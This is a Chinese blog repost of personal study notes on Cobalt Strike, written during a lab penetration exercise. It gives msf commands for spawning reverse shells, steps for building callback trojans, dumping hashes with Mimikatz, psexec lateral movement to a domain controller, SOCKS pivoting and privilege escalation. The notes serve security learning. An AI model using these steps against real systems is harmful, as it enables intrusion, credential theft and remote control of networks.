干货 | CobaltStrike学习笔记

admin 2022年10月5日11:36:36评论38 views字数 2753阅读9分10秒阅读模式

一、啰嗦一下

想学 cs 是因为在写这篇 https://www.cnblogs.com/wkzb/p/12358076.html 靶机渗透的博客时,看大佬们的 wp 很多人是用 cs 做的。

系统学习的话内容还是很多的,就从这次靶机渗透开始,记录一下目前用到的模块,下面每个小节的服务端与客户端 ip 可能不相同,因为这篇随笔是用到哪学到哪,实验环境不同,长期更新。


二、cs启动

cabaltstrike 工具使用时分为服务端和客户端,启动服务端后可以有很多客户端连接,团队合作使用很方便,实验时也可以服务端客户端在一台机器启动。

这次实验 https://www.cnblogs.com/wkzb/p/12358076.html 还是用这次靶机渗透环境,把服务端和客户端分开做实验,以免在一些设置上混淆了。

服务端在 kali 启动,命令是:./teamserver 本机 ip 连接密码

干货 | CobaltStrike学习笔记


客户端在物理机启动,Host 填服务端 ip,User 随便写,密码填刚刚设置的 root

干货 | CobaltStrike学习笔记


三、msf派生权限

先在 cs 开启监听,Cobalt Strike->Listeners-Add,Name 随便填,Host 填写服务端 ip,Port 填写服务端设置的端口

干货 | CobaltStrike学习笔记


拥有 msf shell 的攻击机与搭建 cobaltstrike 的服务端不需要是同一台主机,端口相通即可实现远程派生 shell

msf 执行命令


use exploit/windows/local/payload_inject
set payload windows
/meterpreter/reverse_http
set DisablePayloadHandler
true   #默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于已经有了一个不需要再产生一个,所以这里设置为true
set lhost xxxx                   #cobaltstrike监听的ip
set lport
14444                  #cobaltstrike监听的端口
set session
1                    #这里是当前获得的session的id
exploit

干货 | CobaltStrike学习笔记


可以看到 cs 成功接收到 shell(如下 win7 在靶场中最初设置 ip 是 192.168.136.129,隔了一段时间又拿出来玩,网络环境有变化,ip 分配到了 130)

干货 | CobaltStrike学习笔记


右键 Interact 调出 beacon 界面,net view 查看当前域中计算机列表,然后执行 shell 命令前面加上 shell 就可以了,例如 shell ipconfig

干货 | CobaltStrike学习笔记


四、制作木马

首先创建监听器用于木马回连,Host 为 cs 服务端的 ip

干货 | CobaltStrike学习笔记


Attacks->Packages->Windows Executable 再根据靶机的类型勾选,生成木马即可

干货 | CobaltStrike学习笔记


靶机上传木马并运行,cs 客户端WEB机成功上线

干货 | CobaltStrike学习笔记


五、凭据存储

密码读取

右键->Access->Dump Hashes(需要Administrator权限)

右键->Access->Run Mimikatz

干货 | CobaltStrike学习笔记


六、psexec传递

获取凭据后对目标网段进行端口存活探测,因为是 psexec 传递登录,这里仅需探测445端口

命令:portscan ip网段 端口 扫描协议(arp、icmp、none) 线程

例如:portscan 10.10.10.0/24 445 arp 200

干货 | CobaltStrike学习笔记


工具栏 View->Targets 查看端口探测后的存活主机

干货 | CobaltStrike学习笔记


新建一个 Listener,注意 Payload 选择 windows/beacon_smb/bind_pipe

干货 | CobaltStrike学习笔记


存活主机右键->Login->psexec,选择之前获取到的凭据信息(明文密文均可),选择 Listener 及主机 Session

干货 | CobaltStrike学习笔记

干货 | CobaltStrike学习笔记


DC成功上线

干货 | CobaltStrike学习笔记


七、cs派生权限

msf 先设置监听


msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost ip.ip.ip.ip
lhost => ip.ip.ip.ip
msf5 exploit(multi/handler) > set lport 2323
lport => 2323
msf5 exploit(multi/handler) > exploit


需要派生的目标右击选择Spawn,然后创建一个 windows/foreign/reverse_tcp Listener,再选择这个监听器

干货 | CobaltStrike学习笔记


八、socks代理

主机右键->Pivoting->SOCKS Server 开启 socks4 代理,设置 proxifier 代理服务器,修改 proxifier 默认代理规则,使用攻击机上的工具对内网做更多操作

干货 | CobaltStrike学习笔记


Address 填写 cs 服务端 ip

干货 | CobaltStrike学习笔记


九、ms14-058提权

右键->Access->Elevate->ms14-058 提到 system 权限

干货 | CobaltStrike学习笔记

干货 | CobaltStrike学习笔记


十、Erebus插件

项目地址:https://github.com/DeEpinGh0st/Erebus

部分功能要在 cs4.0 以上

Cobalt Strike->脚本管理器-Load

干货 | CobaltStrike学习笔记


十一、下载文件

右键->目标->文件管理->找到需要的文件右键->Download

再点击菜单栏的下载图标->选中文件->Sync Files ->选择路径保存

干货 | CobaltStrike学习笔记


十二、端口扫描

右键->目标->端口扫描

干货 | CobaltStrike学习笔记


十三、反向连接多层内网

目标主动连接我们(可以避免防火墙的拦截),这里暂时没实验成功

右键->中转->Listener

干货 | CobaltStrike学习笔记


攻击->生成后门->Windows Executable(s) 再根据靶机的类型勾选,生成木马并上传到目标机器运行即可

干货 | CobaltStrike学习笔记


十四、正向连接多层内网

我们主动连接目标

创建监听器,Payload 选 Beacon TCP

干货 | CobaltStrike学习笔记


攻击->生成后门->Windows Executable(s) 再根据靶机的类型勾选,生成木马并上传到目标机器运行,在跳板机会话中执行


connect 192.168.22.135(目标ip) 2333(监听器端口)


干货 | CobaltStrike学习笔记


推荐阅读


实战 | 记一次渗透拿下某儿童色情网站的经过


实战 | 某某街一处XSS的绕过思路


实战 | 记一次企业钓鱼演练


2022年,从现在开始学安全还不迟!


干货 | 2022年超全的安全知识库


实战 | 实战一次完整的BC网站渗透测试


作者:wkzb
原文地址:https://www.cnblogs.com/wkzb/p/12431487.html

如有侵权,请联系删除

星球部分精华内容推荐

干货 | CobaltStrike学习笔记


干货 | CobaltStrike学习笔记

干货 | CobaltStrike学习笔记

干货 | CobaltStrike学习笔记

其他更多精彩内容,欢迎加入我们的星球

干货 | CobaltStrike学习笔记


原文始发于微信公众号(HACK学习君):干货 | CobaltStrike学习笔记

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月5日11:36:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   干货 | CobaltStrike学习笔记https://cn-sec.com/archives/1330686.html

发表评论

匿名网友 填写信息